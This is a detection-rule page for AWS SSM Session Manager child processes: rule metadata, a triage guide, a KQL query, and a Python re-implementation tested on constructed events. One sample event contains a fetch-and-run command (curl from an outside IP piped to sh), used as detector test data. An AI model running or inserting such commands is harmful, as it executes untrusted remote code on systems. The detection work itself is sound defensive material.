AWS SSM Session Manager Child Process Execution

IMPORTANT: This documentation is no longer updated. Refer to Elastic's version policy and the latest documentation.


Identifies process start events where the parent process is the AWS Systems Manager (SSM) Session Manager worker. Session Manager provides interactive shell access to EC2 instances and hybrid nodes without bastion hosts or open inbound ports. Adversaries abuse it for remote execution and lateral movement using legitimate AWS credentials and IAM permissions. This rule surfaces endpoint execution occurring under that worker for visibility and hunting. Expect noise from authorized administrative sessions.

Rule type: query

Rule indices:

  • logs-endpoint.events.process*
  • auditbeat-*
  • logs-auditd_manager.auditd-*
  • logs-crowdstrike.fdr*
  • logs-sentinel_one_cloud_funnel.*

Severity: low

Risk score: 21

Runs every: 5m

Searches indices from: now-9m (Date Math format, see also Additional look-back time)

Maximum alerts per execution: 100

References:

Tags:

  • Domain: Endpoint
  • Domain: Cloud
  • OS: Linux
  • OS: Windows
  • OS: macOS
  • Use Case: Threat Detection
  • Tactic: Execution
  • Data Source: Elastic Defend
  • Data Source: Auditd Manager
  • Data Source: Crowdstrike
  • Data Source: SentinelOne
  • Resources: Investigation Guide

Version: 1

Rule authors:

  • Elastic

Rule license: Elastic License v2

Investigation guide


Triage and analysis

Investigating AWS SSM Session Manager Child Process Execution

AWS Systems Manager Session Manager starts a session worker process on the endpoint; the shells and commands run inside the session appear as child processes of that worker. The same mechanism serves authorized administration and adversary activity alike: any principal whose IAM credentials or assumed role permit ssm:StartSession (or related actions) against the managed node gets the same shell, so the process tree alone does not tell the two apart.

Possible investigation steps

  • Confirm whether the host is an EC2 instance or managed node that legitimately uses Session Manager.
  • Review process.command_line, process.executable, process.user.name, and user.name for the child process to judge intent (reconnaissance, download, credential access, persistence, etc.).
  • Correlate timing with AWS CloudTrail for StartSession, ResumeSession, or related SSM API calls and the IAM principal that initiated the session.
  • Pivot on the same host.id or instance identifier for other alerts or SSM activity in the same window.

False positive analysis

  • Routine interactive or automated administration via Session Manager is expected to match this rule by design.
  • Prefer exclusions tied to stable attributes (approved IAM roles, automation service accounts, known script paths) rather than broad process-name allowlists unless validated.

Response and remediation

  • If activity is unauthorized: revoke or rotate the exposed IAM credentials, review the SSM permissions and VPC endpoint policies involved, and terminate suspicious sessions from the AWS console or API (TerminateSession).
  • Isolate the instance if compromise is suspected and perform endpoint forensics following your incident response playbook.

Rule query

event.category: "process" and event.action : ("exec" or "exec_event" or "start" or "ProcessRollup2" or "executed" or "process_started") and
(
 process.parent.name:("ssm-session-worker.exe" or "ssm-session-worker" or "ssm-document-worker.exe" or "ssm-document-worker") or
 (process.name : "powershell.exe" and process.args : *awsrunPowerShellScript*) or
 (process.name : ("dash" or "sh" or "bash") and process.args : *awsrunShellScript*) or
 (process.parent.name : "powershell.exe" and process.parent.args : *awsrunPowerShellScript*) or
 (process.parent.name : ("dash" or "sh" or "bash") and process.parent.args : *awsrunShellScript*)
 ) and
 process.command_line:* and
 not (process.name : "powershell.exe" and process.args :("$str.Substring($str.length" or *Convert-GuidToCompressedGuid* or get-wmiobject* or $wmi_proc* or *win32_quickfixengineering*)) and
 not process.executable : ("/usr/bin/lscpu" or "/usr/bin/snap" or "/usr/bin/rpm" or "/usr/bin/dpkg-query" or /snap/snapd/*/usr/bin/snap or "/usr/bin/id" or "C:\\Program Files\\Amazon\\SSM\\Plugins\\SessionManagerShell\\winpty-agent.exe")
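The following added example (not Elastic's code) re-implements the query's matching logic in Python over a few constructed ECS-style process events, then applies the CloudTrail correlation step from the investigation guide above: each surviving alert is paired with the StartSession/ResumeSession records that targeted the same instance within a short window before the child process started. The exclusion lists are copied from the query; the ECS field layout, the cloud.instance.id join key, the CloudTrail record shape (eventName, requestParameters.target, userIdentity.arn) and the 15-minute window are assumptions for illustration, and all sample events and trail records are constructed.

```python
"""Rule logic from the query above, re-implemented over constructed ECS-style events,
plus the CloudTrail correlation step. Added illustration, not Elastic's code."""
import fnmatch
from datetime import datetime, timedelta

ACTIONS = {"exec", "exec_event", "start", "ProcessRollup2", "executed", "process_started"}
SSM_WORKERS = {"ssm-session-worker.exe", "ssm-session-worker",
               "ssm-document-worker.exe", "ssm-document-worker"}
SHELLS = {"dash", "sh", "bash"}
# Exclusions copied from the query's `not` clauses; `*` is the KQL wildcard, the rest is literal.
PS_EXCLUDED_ARGS = ["$str.Substring($str.length", "*Convert-GuidToCompressedGuid*",
                    "get-wmiobject*", "$wmi_proc*", "*win32_quickfixengineering*"]
EXCLUDED_EXECUTABLES = [
    "/usr/bin/lscpu", "/usr/bin/snap", "/usr/bin/rpm", "/usr/bin/dpkg-query",
    "/snap/snapd/*/usr/bin/snap", "/usr/bin/id",
    r"C:\Program Files\Amazon\SSM\Plugins\SessionManagerShell\winpty-agent.exe"]

def _get(doc, path):
    """Dotted-path lookup into a nested ECS document; None if any segment is missing."""
    for key in path.split("."):
        if not isinstance(doc, dict) or key not in doc:
            return None
        doc = doc[key]
    return doc

def _any(values, pattern):
    """KQL `field : pattern`: a multi-valued field matches when any element matches."""
    if values is None:
        return False
    values = values if isinstance(values, list) else [values]
    return any(fnmatch.fnmatchcase(str(v), pattern) for v in values)

def matches_rule(ev):
    """True when the event satisfies the rule query, exclusions included."""
    if not _any(_get(ev, "event.category"), "process") or _get(ev, "event.action") not in ACTIONS:
        return False
    name, args = _get(ev, "process.name"), _get(ev, "process.args")
    pname, pargs = _get(ev, "process.parent.name"), _get(ev, "process.parent.args")
    triggered = (
        pname in SSM_WORKERS
        or (name == "powershell.exe" and _any(args, "*awsrunPowerShellScript*"))
        or (name in SHELLS and _any(args, "*awsrunShellScript*"))
        or (pname == "powershell.exe" and _any(pargs, "*awsrunPowerShellScript*"))
        or (pname in SHELLS and _any(pargs, "*awsrunShellScript*")))
    if not triggered or not _get(ev, "process.command_line"):  # `command_line:*` needs the field populated
        return False
    if name == "powershell.exe" and any(_any(args, p) for p in PS_EXCLUDED_ARGS):
        return False
    exe = _get(ev, "process.executable")
    return not (exe and any(fnmatch.fnmatchcase(exe, p) for p in EXCLUDED_EXECUTABLES))

def _ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))

def correlate_with_cloudtrail(alerts, trail, window=timedelta(minutes=15)):
    """Pair each alert with the IAM principals whose StartSession/ResumeSession targeted the
    alert's instance within `window` before the child process started (assumed join logic)."""
    out = []
    for a in alerts:
        started, instance = _ts(a["@timestamp"]), _get(a, "cloud.instance.id")
        principals = [t["userIdentity"]["arn"] for t in trail
                      if t.get("eventSource") == "ssm.amazonaws.com"
                      and t.get("eventName") in ("StartSession", "ResumeSession")
                      and t.get("requestParameters", {}).get("target") == instance
                      and timedelta(0) <= started - _ts(t["eventTime"]) <= window]
        out.append((a, principals))
    return out

def analyze(events, trail):
    """Run the rule over `events`, then attach the correlated session initiators."""
    alerts = [e for e in events if matches_rule(e)]
    return [(a["process"]["name"], p) for a, p in correlate_with_cloudtrail(alerts, trail)]

def _proc(ts, instance, name, exe, cmd, parent, action="exec"):
    """Constructed ECS-like process event (helper for the sample data only)."""
    return {"@timestamp": ts, "event": {"category": ["process"], "action": action},
            "cloud": {"instance": {"id": instance}},
            "process": {"name": name, "executable": exe, "command_line": cmd, "args": cmd.split(),
                        "parent": {"name": parent, "args": [parent]}}}

PS_EXE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed, not real telemetry
    _proc("2024-05-01T10:00:30Z", "i-0aaa", "bash", "/usr/bin/bash",
          "bash -c 'curl http://198.51.100.7/x | sh'", "ssm-session-worker"),
    _proc("2024-05-01T10:00:31Z", "i-0aaa", "id", "/usr/bin/id", "id", "ssm-session-worker"),  # excluded path
    _proc("2024-05-01T11:00:00Z", "i-0bbb", "powershell.exe", PS_EXE,
          r"powershell.exe -File C:\ProgramData\Amazon\SSM\awsrunPowerShellScript\_script.ps1",
          "ssm-document-worker.exe", action="start"),
    _proc("2024-05-01T11:00:05Z", "i-0bbb", "powershell.exe", PS_EXE,
          "powershell.exe -Command Convert-GuidToCompressedGuid", "ssm-document-worker.exe", action="start"),
    _proc("2024-05-01T12:00:00Z", "i-0aaa", "bash", "/usr/bin/bash", "bash -c whoami", "sshd"),  # not under SSM
]
SAMPLE_TRAIL = [  # constructed CloudTrail records; field names follow the CloudTrail record format
    {"eventTime": "2024-05-01T09:58:00Z", "eventSource": "ssm.amazonaws.com", "eventName": "StartSession",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/ops-admin"}, "requestParameters": {"target": "i-0aaa"}},
    {"eventTime": "2024-05-01T07:00:00Z", "eventSource": "ssm.amazonaws.com", "eventName": "StartSession",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:role/earlier-shift"}, "requestParameters": {"target": "i-0aaa"}},
]
```

Running analyze(SAMPLE_EVENTS, SAMPLE_TRAIL) yields two alerts: the bash child on i-0aaa, attributed to the ops-admin StartSession two and a half minutes earlier (the 07:00 session falls outside the window), and the awsrunPowerShellScript child on i-0bbb with no matching CloudTrail call, which is the case worth a closer look. The /usr/bin/id child and the Convert-GuidToCompressedGuid invocation are dropped by the query's exclusions exactly as in the rule, and the sshd-spawned shell never triggers. In production this join belongs in the SIEM (a CloudTrail-backed lookup or a correlation rule) rather than in a script, but the logic is the same.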

Framework: MITRE ATT&CK™